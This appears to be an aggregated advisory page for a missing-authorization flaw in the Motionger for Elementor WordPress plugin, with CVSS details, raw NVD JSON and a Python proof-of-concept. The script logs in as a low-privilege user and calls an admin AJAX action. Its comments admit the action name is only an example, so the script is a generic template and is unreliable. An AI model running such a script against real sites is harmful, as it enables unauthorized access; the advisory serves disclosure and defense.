Security Vulnerability Report
中文
CVE-2025-66138 CVSS 5.4 MEDIUM

CVE-2025-66138

Published: 2026-01-22 17:16:01
Last Modified: 2026-04-27 18:16:38

Description

Missing Authorization vulnerability in merkulove Motionger for Elementor motionger-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Motionger for Elementor: from n/a through <= 2.0.4.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Motionger for Elementor <= 2.0.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66138 PoC - Motionger Elementor Missing Authorization # Description: Missing Authorization in Motionger for Elementor plugin import requests import sys TARGET_URL = input("Enter target URL (e.g., http://target.com): ").rstrip('/') USERNAME = input("Enter low-privilege username: ") PASSWORD = input("Enter password: ") def get_nonce(login_url): """Extract nonce from WordPress login page""" response = requests.get(login_url) # In real attack, extract nonce from response return "" def exploit(): """Exploit missing authorization vulnerability""" session = requests.Session() # Step 1: Login with low-privilege account login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': f"{TARGET_URL}/wp-admin/" } resp = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful with low-privilege account") # Step 2: Exploit missing authorization # Target vulnerable AJAX action (specific action depends on plugin version) exploit_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Example: Access normally admin-only functionality exploit_data = { 'action': 'motionger_get_settings', # Vulnerable action 'nonce': '', # May not be required due to missing auth check } resp = session.post(exploit_url, data=exploit_data) if resp.status_code == 200: print(f"[+] Exploit successful - Received response: {resp.text[:200]}") return True else: print(f"[-] Exploit failed with status: {resp.status_code}") return False if __name__ == "__main__": exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66138", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:00.723", "lastModified": "2026-04-27T18:16:37.800", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in merkulove Motionger for Elementor motionger-elementor allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Motionger for Elementor: from n/a through <= 2.0.4."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en merkulove Motionger para Elementor motionger-elementor permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a Motionger para Elementor: desde n/a hasta &lt;= 2.0.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/motionger-elementor/vulnerability/wordpress-motionger-for-elementor-plugin-2-0-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}